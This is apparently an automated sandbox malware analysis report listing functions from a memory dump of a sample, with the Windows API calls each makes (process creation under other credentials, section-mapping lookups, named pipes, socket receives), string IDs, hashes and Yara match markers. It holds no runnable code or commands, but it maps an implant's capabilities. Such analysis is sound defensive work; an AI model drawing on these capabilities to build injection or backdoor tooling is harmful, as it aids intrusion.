                            • Instruction Fuzzy Hash: 4C016D70900346AED711AF7AC885E96BBE8EF44750B10882DF489C7281EE74D9048BB4
                            Function 00DB8E51 Relevance: 9.1, APIs: 6, Instructions: 113networkCOMMONLIBRARYCODE
                            Download Yara Rule
                            APIs
                            • _malloc.LIBCMT ref: 00DB8E75
                              • Part of subcall function 00DC87FF: __FF_MSGBANNER.LIBCMT ref: 00DC8822
                              • Part of subcall function 00DC87FF: __NMSG_WRITE.LIBCMT ref: 00DC8829
                              • Part of subcall function 00DC87FF: RtlAllocateHeap.NTDLL(00000000,-0000000F,00000001,00000000,00000000,?,00DD181E,00000000,00000001,00000000,?,00DCA834,00000018,00DE3700,0000000C,00DCA8C5), ref: 00DC8876
                            • htonl.WS2_32(?), ref: 00DB8EA1
                            • recvfrom.WS2_32(00000000,?,000FFFFC,00000000,?,?), ref: 00DB8ED0
                            • WSAGetLastError.WS2_32 ref: 00DB8EDB
                            Memory Dump Source
                            • Source File: 00000000.00000002.4124981749.0000000000DB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00DB0000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_db0000_12.jbxd
                            Yara matches
                            Similarity
                            • API ID: AllocateErrorHeapLast_mallochtonlrecvfrom
                            • String ID:
                            • API String ID: 987280018-0
                            • Opcode ID: 4943e5c7a7a6126ce8bb536adaecf4282858c5e75b959dc0af752a475ff7b00c
                            • Instruction ID: c7929eb3038dc7345d2fd64529fbf0c49abd800aa3799337ea435c9cee567cc6
                            • Opcode Fuzzy Hash: 4943e5c7a7a6126ce8bb536adaecf4282858c5e75b959dc0af752a475ff7b00c
                            • Instruction Fuzzy Hash: 0241D671800204EFD7209F64DC01BBA7BBEEF48364F14811AF512E32A1DB309944EB74
                            Function 00DB3741 Relevance: 9.1, APIs: 6, Instructions: 103sleeppipeCOMMON
                            Download Yara Rule
                            APIs
                            Memory Dump Source
                            • Source File: 00000000.00000002.4124981749.0000000000DB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00D70000, based on PE: true
                            • Associated: 00000000.00000002.4124957822.0000000000D70000.00000020.00001000.00020000.00000000.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_d70000_12.jbxd
                            Yara matches
                            Similarity
                            • API ID: ErrorLastSleep$BuffersDisconnectFileFlushNamedPipe
                            • String ID:
                            • API String ID: 1974096663-0
                            • Opcode ID: 025b19708d78a27d441bb2671cdb6a4e8a64585d7640623aa128e677628c9b55
                            • Instruction ID: 203481af661b36872f218c4ada17c487b8556bc08f153c7260eeea54ebb49ce8
                            • Opcode Fuzzy Hash: 025b19708d78a27d441bb2671cdb6a4e8a64585d7640623aa128e677628c9b55
                            • Instruction Fuzzy Hash: 0C3108B6D00219EBDB01EBA4DC86AEEB7B8EB04714F150066E506E6250DB31AF44DBB1
                            Function 00DBCB1C Relevance: 9.1, APIs: 6, Instructions: 92COMMONLIBRARYCODE
                            Download Yara Rule
                            APIs
                            • __time64.LIBCMT ref: 00DBCB28
                              • Part of subcall function 00DC9E8E: GetSystemTimeAsFileTime.KERNEL32(00000000,?,?,?,00DBCB2D,00000000,00000080,?,?,?,00DB13F0,?,00000000,00000000,00000000,00000000), ref: 00DC9E99
                              • Part of subcall function 00DC9E8E: __aulldiv.LIBCMT ref: 00DC9EB9
                              • Part of subcall function 00DC8C0A: __getptd.LIBCMT ref: 00DC8C0F
                            • _malloc.LIBCMT ref: 00DBCB71
                            • _memset.LIBCMT ref: 00DBCB8F
                            • _strtok.LIBCMT ref: 00DBCBB4
                            • _strtok.LIBCMT ref: 00DBCBD7
                            • _strtok.LIBCMT ref: 00DBCBE6
                            Memory Dump Source
                            • Source File: 00000000.00000002.4124981749.0000000000DB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00DB0000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_db0000_12.jbxd
                            Yara matches
                            Similarity
                            • API ID: _strtok$Time$FileSystem__aulldiv__getptd__time64_malloc_memset
                            • String ID:
                            • API String ID: 3072773955-0
                            • Opcode ID: d453ffc350d39557901464439530faad7ce2d124d2d95a94970e1976643b44e8
                            • Instruction ID: 3182926ddb897a38bf03a84c4be00b3b8b6d0f680a5de58a4967242e6185536b
                            • Opcode Fuzzy Hash: d453ffc350d39557901464439530faad7ce2d124d2d95a94970e1976643b44e8
                            • Instruction Fuzzy Hash: 8521A0B1504705AFD719DF38D886EFB7BE9EB05354B00042DF89AC7241EA31E9098B75
                            Function 00D7BF1C Relevance: 9.1, APIs: 6, Instructions: 92COMMONLIBRARYCODE
                            Download Yara Rule
                            APIs
                            Memory Dump Source
                            • Source File: 00000000.00000002.4124957822.0000000000D70000.00000020.00001000.00020000.00000000.sdmp, Offset: 00D70000, based on PE: true
                            • Associated: 00000000.00000002.4124981749.0000000000DB0000.00000040.00001000.00020000.00000000.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_d70000_12.jbxd
                            Yara matches
                            Similarity
                            • API ID: _strtok$__aulldiv__getptd__time64_malloc_memset
                            • String ID:
                            • API String ID: 512601900-0
                            • Opcode ID: 48720511a30ea9561bc50dee288fc5aadba22df75b4c1b9df4666e77f59b8890
                            • Instruction ID: 2d4d1a311c9f58b4c460af336a4a6a61fa8c15b1a6fae911566a4cd533c52568
                            • Opcode Fuzzy Hash: 48720511a30ea9561bc50dee288fc5aadba22df75b4c1b9df4666e77f59b8890
                            • Instruction Fuzzy Hash: 8F21D2B51047056FD719EF38D896AB7B7E9EF05710B00442EF89AC7241EB31E8058B71
                            Function 00DB94FD Relevance: 9.1, APIs: 6, Instructions: 91threadCOMMON
                            Download Yara Rule
                            APIs
                            • GetLastError.KERNEL32 ref: 00DB951B
                            • UpdateProcThreadAttribute.KERNEL32(?,00000000,00020000,?,00000004,00000000,00000000), ref: 00DB9549
                            • GetLastError.KERNEL32 ref: 00DB9553
                            • GetCurrentProcess.KERNEL32(00000000,00000000,?), ref: 00DB9588
                            • GetCurrentProcess.KERNEL32(00000000,?,?), ref: 00DB95AA
                            • GetCurrentProcess.KERNEL32(?,?,?), ref: 00DB95C3
                            Memory Dump Source
                            • Source File: 00000000.00000002.4124981749.0000000000DB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00DB0000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_db0000_12.jbxd
                            Yara matches
                            Similarity
                            • API ID: CurrentProcess$ErrorLast$AttributeProcThreadUpdate
                            • String ID:
                            • API String ID: 1014270282-0
                            • Opcode ID: 3acba6e7910b979eac7d9ad6a5a76469889a1c6d24a557577db3b0499bf93150
                            • Instruction ID: 6f983b5b9b4c613e8e8b06d7b9c6411864d530be2fb46cbd79f42d1337a3a51e
                            • Opcode Fuzzy Hash: 3acba6e7910b979eac7d9ad6a5a76469889a1c6d24a557577db3b0499bf93150
                            • Instruction Fuzzy Hash: 4B213BB6644345FFEB25AFB49C5ADAA77BDEB08354B14081DBA07C2241EA70E9108630
                            Function 00D752EC Relevance: 9.1, APIs: 6, Instructions: 73COMMONLIBRARYCODE
                            Download Yara Rule
                            APIs
                            • _memset.LIBCMT ref: 00D752FC
                            • _memset.LIBCMT ref: 00D75308
                              • Part of subcall function 00D75472: _malloc.LIBCMT ref: 00D754C4
                              • Part of subcall function 00D75472: _malloc.LIBCMT ref: 00D754CF
                              • Part of subcall function 00D75472: _memset.LIBCMT ref: 00D754DB
                              • Part of subcall function 00D75472: _memset.LIBCMT ref: 00D754E6
                              • Part of subcall function 00D75472: _rand.LIBCMT ref: 00D75544
                            • __snprintf.LIBCMT ref: 00D75359
                            • __snprintf.LIBCMT ref: 00D75371
                            • _memset.LIBCMT ref: 00D75390
                            • _memset.LIBCMT ref: 00D7539B
                            Memory Dump Source
                            • Source File: 00000000.00000002.4124957822.0000000000D70000.00000020.00001000.00020000.00000000.sdmp, Offset: 00D70000, based on PE: true
                            • Associated: 00000000.00000002.4124981749.0000000000DB0000.00000040.00001000.00020000.00000000.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_d70000_12.jbxd
                            Yara matches
                            Similarity
                            • API ID: _memset$__snprintf_malloc$_rand
                            • String ID:
                            • API String ID: 1876596931-0
                            • Opcode ID: e9ed54a4a77dd13d35101f88d34e502c55548b4bb63c99b13df0d58da31436f4
                            • Instruction ID: 725fd23e788a829c402276a8450ca6f1e775ae81624473a41dd206a5f7a64cd3
                            • Opcode Fuzzy Hash: e9ed54a4a77dd13d35101f88d34e502c55548b4bb63c99b13df0d58da31436f4
                            • Instruction Fuzzy Hash: E1213871900100BBDF19AF14DC82F5B3A69EF95750F288094FD046B2A6E6B1ED21CBB5
                            Function 00DB71C8 Relevance: 9.1, APIs: 6, Instructions: 62pipefileCOMMON
                            Download Yara Rule
                            APIs
                            • GetLastError.KERNEL32(?,00DB72A9,00DB37B2,00000000,?,00DB37B2,?), ref: 00DB71EC
                            • WaitNamedPipeA.KERNEL32(00DB37B2,00002710), ref: 00DB7201
                            • CreateFileA.KERNEL32(00DB37B2,C0000000,00000000,00000000,00000003,00000000,00000000,74DF23A0,-0000EA60,?,?,?,00DB72A9,00DB37B2,00000000), ref: 00DB7219
                            • SetNamedPipeHandleState.KERNEL32(?,00DB37B2,00000000,00000000,?,00DB72A9,00DB37B2,00000000,?,00DB37B2,?), ref: 00DB722F
                            • DisconnectNamedPipe.KERNEL32(?,?,00DB72A9,00DB37B2,00000000,?,00DB37B2,?), ref: 00DB723B
                            Memory Dump Source
                            • Source File: 00000000.00000002.4124981749.0000000000DB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00DB0000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_d70000_12.jbxd
                            Yara matches
                            Similarity
                            • API ID: NamedPipe$CreateDisconnectErrorFileHandleLastStateWait
                            • String ID:
                            • API String ID: 927366879-0
                            • Opcode ID: 12909c5420fcdafc485a1b38c53e1d7588b9f05aea3928dc37c0d276ea22c319
                            • Instruction ID: 5d879dbda8bca38238056e8fd721918c3aea5e2bb28941ac8e71e6d78aef1717
                            • Opcode Fuzzy Hash: 12909c5420fcdafc485a1b38c53e1d7588b9f05aea3928dc37c0d276ea22c319
                            • Instruction Fuzzy Hash: 93115E71218214FFEB105B64DC09FBB3BADEF86715F10056BF916D61A0E7709D408A75
                            Function 00DB4B7A Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 130processCOMMON
                            Download Yara Rule
                            APIs
                              • Part of subcall function 00DB81BC: _malloc.LIBCMT ref: 00DB81C2
                              • Part of subcall function 00DB81BC: _malloc.LIBCMT ref: 00DB81D2
                            • _memset.LIBCMT ref: 00DB4BDD
                            • GetStartupInfoA.KERNEL32(?), ref: 00DB4BF5
                            • CreateProcessWithLogonW.ADVAPI32(?,?,?,00000001,00000000,00000000,00000000,00000000,00000000,?,00DB32CF), ref: 00DB4C8F
                            • GetLastError.KERNEL32 ref: 00DB4C9E
                              • Part of subcall function 00DB26E2: _vswprintf_s.LIBCMT ref: 00DB26FE
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.4124981749.0000000000DB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00D70000, based on PE: true
                            • Associated: 00000000.00000002.4124957822.0000000000D70000.00000020.00001000.00020000.00000000.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_d70000_12.jbxd
                            Yara matches
                            Similarity
                            • API ID: _malloc$CreateErrorInfoLastLogonProcessStartupWith_memset_vswprintf_s
                            • String ID: %s as %s\%s: %d
                            • API String ID: 709525413-816037529
                            • Opcode ID: c596897c02fba1d8616f7f351f8061e9721a8c8fe42293f6402d3ecdafc7190b
                            • Instruction ID: a3b4c1fca304884cd97fce5b0d836c5f3b7b681356d920752c3091cc7269ca03
                            • Opcode Fuzzy Hash: c596897c02fba1d8616f7f351f8061e9721a8c8fe42293f6402d3ecdafc7190b
                            • Instruction Fuzzy Hash: E3413471D00209BADF01AFA9DC85EEFBFB9EF89750F10401AF605A6261DB718A10DB71
                            Function 00DB3927 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 96COMMON
                            Download Yara Rule
                            APIs
                            • htonl.WS2_32(00000000), ref: 00DB3982
                            • htonl.WS2_32(?), ref: 00DB398D
                            • _malloc.LIBCMT ref: 00DB39A4
                              • Part of subcall function 00DC87FF: __FF_MSGBANNER.LIBCMT ref: 00DC8822
                              • Part of subcall function 00DC87FF: __NMSG_WRITE.LIBCMT ref: 00DC8829
                              • Part of subcall function 00DC87FF: RtlAllocateHeap.NTDLL(00000000,-0000000F,00000001,00000000,00000000,?,00DD181E,00000000,00000001,00000000,?,00DCA834,00000018,00DE3700,0000000C,00DCA8C5), ref: 00DC8876
                            • _memset.LIBCMT ref: 00DB39FD
                              • Part of subcall function 00DBC0FD: __snprintf.LIBCMT ref: 00DBC13C
                              • Part of subcall function 00DBC0FD: __snprintf.LIBCMT ref: 00DBC14E
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.4124981749.0000000000DB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00DB0000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_d70000_12.jbxd
                            Yara matches
                            Similarity
                            • API ID: __snprintfhtonl$AllocateHeap_malloc_memset
                            • String ID: zyxwvutsrqponmlk
                            • API String ID: 1734027086-3884694604
                            • Opcode ID: 514e3753d2bd9c259749d215b49606ed3ef850e240ef56736913425497327ee4
                            • Instruction ID: 67a24d2acceda025e2f6b3b31f1d1a98e1ff00740470014dce36a706beb22cfe
                            • Opcode Fuzzy Hash: 514e3753d2bd9c259749d215b49606ed3ef850e240ef56736913425497327ee4
                            • Instruction Fuzzy Hash: EC21F862E00611F6DB207AB59C82BEF7AA8EF45320F240169F947B7283E9658A0156B5
                            Function 00DB3927 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 96COMMONLIBRARYCODE
                            Download Yara Rule
                            APIs
                            • htonl.WS2_32(00000000), ref: 00DB3982
                            • htonl.WS2_32(?), ref: 00DB398D
                            • _malloc.LIBCMT ref: 00DB39A4
                              • Part of subcall function 00DC87FF: __FF_MSGBANNER.LIBCMT ref: 00DC8822
                              • Part of subcall function 00DC87FF: __NMSG_WRITE.LIBCMT ref: 00DC8829
                              • Part of subcall function 00DC87FF: RtlAllocateHeap.NTDLL(00000000,?,?,00004008,00DEFFA0,?,00DB106E,00004008,?,?,?,?,00000003,?,70207369), ref: 00DC8876
                            • _memset.LIBCMT ref: 00DB39FD
                              • Part of subcall function 00DBC0FD: __snprintf.LIBCMT ref: 00DBC13C
                              • Part of subcall function 00DBC0FD: __snprintf.LIBCMT ref: 00DBC14E
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.4124981749.0000000000DB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00D70000, based on PE: true
                            • Associated: 00000000.00000002.4124957822.0000000000D70000.00000020.00001000.00020000.00000000.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_d70000_12.jbxd
                            Yara matches
                            Similarity
                            • API ID: __snprintfhtonl$AllocateHeap_malloc_memset
                            • String ID: zyxwvutsrqponmlk
                            • API String ID: 1734027086-3884694604
                            • Opcode ID: ad366776143dd28f26c6a46f52a6100db2ff96930d8d0fef39d2a1d0d8ceeea0
                            • Instruction ID: 67a24d2acceda025e2f6b3b31f1d1a98e1ff00740470014dce36a706beb22cfe
                            • Opcode Fuzzy Hash: ad366776143dd28f26c6a46f52a6100db2ff96930d8d0fef39d2a1d0d8ceeea0
                            • Instruction Fuzzy Hash: EC21F862E00611F6DB207AB59C82BEF7AA8EF45320F240169F947B7283E9658A0156B5
                            Function 00DB690F Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 79libraryloaderCOMMON
                            Download Yara Rule
                            APIs
                            • GetModuleHandleA.KERNEL32(ntdll.dll,NtMapViewOfSection,00000000,?,00000000,00DB65ED,00000000,00000000,00000000), ref: 00DB693C
                            • GetProcAddress.KERNEL32(00000000), ref: 00DB6943
                            • GetLastError.KERNEL32 ref: 00DB69B6
                              • Part of subcall function 00DBD9B2: GetCurrentProcess.KERNEL32(000F003F,00000000,00000000,?,00000000,00000001,00000000,D78B5955,00000000,?,?,00DB1FCE,00000000,000F003F,?,00000000), ref: 00DBDA21
                              • Part of subcall function 00DBDA6F: GetCurrentProcess.KERNEL32(00000080,?,00DB1D9E,?,00000000,00000000,00000001,?,?,00DBDE6B,00000000,00000001,00000000,00000000,00000080,00DB16C4), ref: 00DBDAAF
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.4124981749.0000000000DB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00DB0000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_d70000_12.jbxd
                            Yara matches
                            Similarity
                            • API ID: CurrentProcess$AddressErrorHandleLastModuleProc
                            • String ID: NtMapViewOfSection$ntdll.dll
                            • API String ID: 1006775078-3170647572
                            • Opcode ID: 29413c21cf015658473e04e7f3fc3de74da2b1e964dc8f3f4121e26d4ac5bcb0
                            • Instruction ID: 995966c726870662a57c23daeadeacdebacf52557275ad081aa40bcf98448959
                            • Opcode Fuzzy Hash: 29413c21cf015658473e04e7f3fc3de74da2b1e964dc8f3f4121e26d4ac5bcb0
                            • Instruction Fuzzy Hash: A211A276900318FFDB107BE49C4ADEE3B69EB48B60F24041AF616D6181EA34C9458BB4
                            Function 00DB97C6 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 39COMMON
                            Download Yara Rule
                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.4124981749.0000000000DB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00DB0000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_db0000_12.jbxd
                            Yara matches
                            Similarity
                            • API ID: __snprintf$_memset
                            • String ID: %s&%s=%s$?%s=%s
                            • API String ID: 444161222-3403399194
                            • Opcode ID: d241f453815a1fbcc23cc37b66e79076997938f7731550cc7e5f521cc009b867
                            • Instruction ID: e885b87c2f634e1c4f006ba218a90456a791e56a47f31f716ae71b394039dbb8
                            • Opcode Fuzzy Hash: d241f453815a1fbcc23cc37b66e79076997938f7731550cc7e5f521cc009b867
                            • Instruction Fuzzy Hash: C501D1B1104240EBDB11AE50CC81F9BB768EF85710F844459FA426B157D631ED11DB72
                            Function 00D7071C Relevance: 7.8, APIs: 5, Instructions: 308COMMONLIBRARYCODE
                            Download Yara Rule
                            APIs
                              • Part of subcall function 00D775BC: _malloc.LIBCMT ref: 00D775C2
                              • Part of subcall function 00D775BC: _malloc.LIBCMT ref: 00D775D2
                            • _malloc.LIBCMT ref: 00D707B2
                              • Part of subcall function 00D87BFF: __FF_MSGBANNER.LIBCMT ref: 00D87C22
                              • Part of subcall function 00D87BFF: __NMSG_WRITE.LIBCMT ref: 00D87C29
                              • Part of subcall function 00D7BF1C: __time64.LIBCMT ref: 00D7BF28
                              • Part of subcall function 00D7BF1C: _malloc.LIBCMT ref: 00D7BF71
                              • Part of subcall function 00D7BF1C: _memset.LIBCMT ref: 00D7BF8F
                              • Part of subcall function 00D7BF1C: _strtok.LIBCMT ref: 00D7BFB4
                              • Part of subcall function 00D7BF1C: _strtok.LIBCMT ref: 00D7BFE6
                              • Part of subcall function 00D7503E: __time64.LIBCMT ref: 00D7504B
                            • _malloc.LIBCMT ref: 00D70886
                            • __snprintf.LIBCMT ref: 00D708E8
                            • __snprintf.LIBCMT ref: 00D70907
                            • __snprintf.LIBCMT ref: 00D70925
                            Memory Dump Source
                            • Source File: 00000000.00000002.4124957822.0000000000D70000.00000020.00001000.00020000.00000000.sdmp, Offset: 00D70000, based on PE: true
                            • Associated: 00000000.00000002.4124981749.0000000000DB0000.00000040.00001000.00020000.00000000.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_d70000_12.jbxd
                            Yara matches
                            Similarity
                            • API ID: _malloc$__snprintf$__time64_strtok$_memset
                            • String ID:
                            • API String ID: 1029070994-0
                            • Opcode ID: e62a893cc577735261ef7e8c98a4b6d1345dbb26b02058c741189192587c7579
                            • Instruction ID: 907c56e80800eca6ef5cfeaa85689010c8be0a398fbc72828ebc8c39a68915b0
                            • Opcode Fuzzy Hash: e62a893cc577735261ef7e8c98a4b6d1345dbb26b02058c741189192587c7579
                            • Instruction Fuzzy Hash: F691E571504340ABE6217B749C07B2F7AA5EF85720F14891EF68C9A1D3FB75CC408AB6
                            Function 00D7B75D Relevance: 7.8, APIs: 5, Instructions: 273COMMONLIBRARYCODE
                            Download Yara Rule
                            APIs
                              • Part of subcall function 00D775BC: _malloc.LIBCMT ref: 00D775C2
                              • Part of subcall function 00D775BC: _malloc.LIBCMT ref: 00D775D2
                            • _memset.LIBCMT ref: 00D7B7CE
                              • Part of subcall function 00D7BBBA: _memset.LIBCMT ref: 00D7BCB6
                            • _malloc.LIBCMT ref: 00D7B7E1
                              • Part of subcall function 00D87BFF: __FF_MSGBANNER.LIBCMT ref: 00D87C22
                              • Part of subcall function 00D87BFF: __NMSG_WRITE.LIBCMT ref: 00D87C29
                            • _memset.LIBCMT ref: 00D7B7F3
                            • _malloc.LIBCMT ref: 00D7B9CF
                            • _memset.LIBCMT ref: 00D7BA61
                            Memory Dump Source
                            • Source File: 00000000.00000002.4124957822.0000000000D70000.00000020.00001000.00020000.00000000.sdmp, Offset: 00D70000, based on PE: true
                            • Associated: 00000000.00000002.4124981749.0000000000DB0000.00000040.00001000.00020000.00000000.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_d70000_12.jbxd
                            Yara matches
                            Similarity
                            • API ID: _malloc_memset
                            • String ID:
                            • API String ID: 4137368368-0
                            • Opcode ID: f9c874aefb29a918ebe8d89783b013946a3c117d743d1f6f25c12c717f7541be
                            • Instruction ID: 01b003dba2702916e4d81d72a0017e27d17984395204186cbaa10f0af61cbd91
                            • Opcode Fuzzy Hash: f9c874aefb29a918ebe8d89783b013946a3c117d743d1f6f25c12c717f7541be
                            • Instruction Fuzzy Hash: F481E6729083106AD624BB24DC86B6FB7E9EF88721F11881FF59C9B181FB74D9448772
                            Function 00DB18D3 Relevance: 7.6, APIs: 5, Instructions: 75COMMON
                            Download Yara Rule
                            APIs
                            Memory Dump Source
                            • Source File: 00000000.00000002.4124981749.0000000000DB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00DB0000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_d70000_12.jbxd
                            Yara matches
                            Similarity
                            • API ID: __vscwprintf_helper_malloc_memset_vswprintf_s_vwprintfhtonl
                            • String ID:
                            • API String ID: 3121112697-0
                            • Opcode ID: cb5f096bf3fad2b11918b14d55575474077282c1f9ba5e56f200f138876ab51a
                            • Instruction ID: 7d8dc72c0230073ffc76bb45c45316b56280a21f0c5ac98960449a853b1727eb
                            • Opcode Fuzzy Hash: cb5f096bf3fad2b11918b14d55575474077282c1f9ba5e56f200f138876ab51a
                            • Instruction Fuzzy Hash: 93118EBA801618FFDB12AFA4DC42EEE7BA8EF44350F14446AF90197141EB309B01DBB5
                            Function 00DB18D3 Relevance: 7.6, APIs: 5, Instructions: 75COMMON
                            Download Yara Rule
                            APIs
                            Memory Dump Source
                            • Source File: 00000000.00000002.4124981749.0000000000DB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00D70000, based on PE: true
                            • Associated: 00000000.00000002.4124957822.0000000000D70000.00000020.00001000.00020000.00000000.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_d70000_12.jbxd
                            Yara matches
                            Similarity
                            • API ID: __vscwprintf_helper_malloc_memset_vswprintf_s_vwprintfhtonl
                            • String ID:
                            • API String ID: 3121112697-0
                            • Opcode ID: eab78c14c4d6226c87d263ad8f6ee971a065a19c0f412d9def1dadf1496e4146
                            • Instruction ID: 7d8dc72c0230073ffc76bb45c45316b56280a21f0c5ac98960449a853b1727eb
                            • Opcode Fuzzy Hash: eab78c14c4d6226c87d263ad8f6ee971a065a19c0f412d9def1dadf1496e4146
                            • Instruction Fuzzy Hash: 93118EBA801618FFDB12AFA4DC42EEE7BA8EF44350F14446AF90197141EB309B01DBB5
                            Function 00D753B6 Relevance: 7.6, APIs: 5, Instructions: 72COMMONLIBRARYCODE
                            Download Yara Rule
                            APIs
                            • _memset.LIBCMT ref: 00D753C6
                            • _memset.LIBCMT ref: 00D753D2
                              • Part of subcall function 00D75472: _malloc.LIBCMT ref: 00D754C4
                              • Part of subcall function 00D75472: _malloc.LIBCMT ref: 00D754CF
                              • Part of subcall function 00D75472: _memset.LIBCMT ref: 00D754DB
                              • Part of subcall function 00D75472: _memset.LIBCMT ref: 00D754E6
                              • Part of subcall function 00D75472: _rand.LIBCMT ref: 00D75544
                            • __snprintf.LIBCMT ref: 00D7542E
                            • _memset.LIBCMT ref: 00D7544C
                            • _memset.LIBCMT ref: 00D75457
                            Memory Dump Source
                            • Source File: 00000000.00000002.4124957822.0000000000D70000.00000020.00001000.00020000.00000000.sdmp, Offset: 00D70000, based on PE: true
                            • Associated: 00000000.00000002.4124981749.0000000000DB0000.00000040.00001000.00020000.00000000.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_d70000_12.jbxd
                            Yara matches
                            Similarity
                            • API ID: _memset$_malloc$__snprintf_rand
                            • String ID:
                            • API String ID: 4266533377-0
                            • Opcode ID: 009c693c855a16ac8fd6041bb0bec3bef12f42173df92b8ba1fd06714240f90e
                            • Instruction ID: 6ad47add5e8a0f1849304895e22ea008dbe2cc67cc9e35a23a06ff70545032c3
                            • Opcode Fuzzy Hash: 009c693c855a16ac8fd6041bb0bec3bef12f42173df92b8ba1fd06714240f90e
                            • Instruction Fuzzy Hash: 98219D31800500BBCF15AF14DC46F9B3B69EF86714F288090FD046B26AE6B1ED61CBB6
                            Function 00DB4A7E Relevance: 7.6, APIs: 5, Instructions: 65processCOMMON
                            Download Yara Rule
                            APIs
                            • CreateProcessAsUserA.ADVAPI32(?,00000000,?,00000000,00000000,00000001,00000004,00000000,00000000,?,?,?,?,00000011,00DB4B75,?), ref: 00DB4AA4
                            • GetLastError.KERNEL32(?,?,00DB9320), ref: 00DB4AB4
                            • GetLastError.KERNEL32(?,?,00DB9320), ref: 00DB4ACE
                              • Part of subcall function 00DB4870: _memset.LIBCMT ref: 00DB489E
                              • Part of subcall function 00DB4870: _memset.LIBCMT ref: 00DB48BA
                            • CreateProcessA.KERNEL32(00000000,?,00000000,00000000,00000001,00000004,00000000,00000000,?,?,?,?,00000011,00DB4B75,?,?), ref: 00DB4AF3
                            • GetLastError.KERNEL32(?,?,00DB9320), ref: 00DB4AFD
                            Memory Dump Source
                            • Source File: 00000000.00000002.4124981749.0000000000DB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00DB0000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_d70000_12.jbxd
                            Yara matches
                            Similarity
                            • API ID: ErrorLast$CreateProcess_memset$User
                            • String ID:
                            • API String ID: 3779600536-0
                            • Opcode ID: b152c126b3ff5e43fff5ebb64b1531b8ce75f194268a06b6f90647a59fe96cb7
                            • Instruction ID: 55680a969a2d1faa51f6f1e410ed1f9e8328033f5f93be7945c7d829b29009eb
                            • Opcode Fuzzy Hash: b152c126b3ff5e43fff5ebb64b1531b8ce75f194268a06b6f90647a59fe96cb7
                            • Instruction Fuzzy Hash: 8F112A35141740FEDB329FA29C48E677BB9EBCAB19B24481EF293C1562D7218450DB34
                            Function 00DB71C8 Relevance: 7.6, APIs: 5, Instructions: 62pipeCOMMON
                            Download Yara Rule
                            APIs
                            • GetLastError.KERNEL32(?,00DB72A9,00DB37B2,00000000,?,00DB37B2,?), ref: 00DB71EC
                            • WaitNamedPipeA.KERNEL32(00DB37B2,00002710), ref: 00DB7201
                            • SetNamedPipeHandleState.KERNEL32(?,00DB37B2,00000000,00000000,?,00DB72A9,00DB37B2,00000000,?,00DB37B2,?), ref: 00DB722F
                            • DisconnectNamedPipe.KERNEL32(?,?,00DB72A9,00DB37B2,00000000,?,00DB37B2,?), ref: 00DB723B
                            Memory Dump Source
                            • Source File: 00000000.00000002.4124981749.0000000000DB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00D70000, based on PE: true
                            • Associated: 00000000.00000002.4124957822.0000000000D70000.00000020.00001000.00020000.00000000.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_d70000_12.jbxd
                            Yara matches
                            Similarity
                            • API ID: NamedPipe$DisconnectErrorHandleLastStateWait
                            • String ID:
                            • API String ID: 2058620245-0
                            • Opcode ID: 12909c5420fcdafc485a1b38c53e1d7588b9f05aea3928dc37c0d276ea22c319
                            • Instruction ID: 5d879dbda8bca38238056e8fd721918c3aea5e2bb28941ac8e71e6d78aef1717
                            • Opcode Fuzzy Hash: 12909c5420fcdafc485a1b38c53e1d7588b9f05aea3928dc37c0d276ea22c319
                            • Instruction Fuzzy Hash: 93115E71218214FFEB105B64DC09FBB3BADEF86715F10056BF916D61A0E7709D408A75
                            Function 00DB8DB3 Relevance: 7.6, APIs: 5, Instructions: 58COMMONLIBRARYCODE
                            Download Yara Rule
                            APIs
                            • GetTickCount.KERNEL32 ref: 00DB8DD8
                            • GetTickCount.KERNEL32 ref: 00DB8DF0
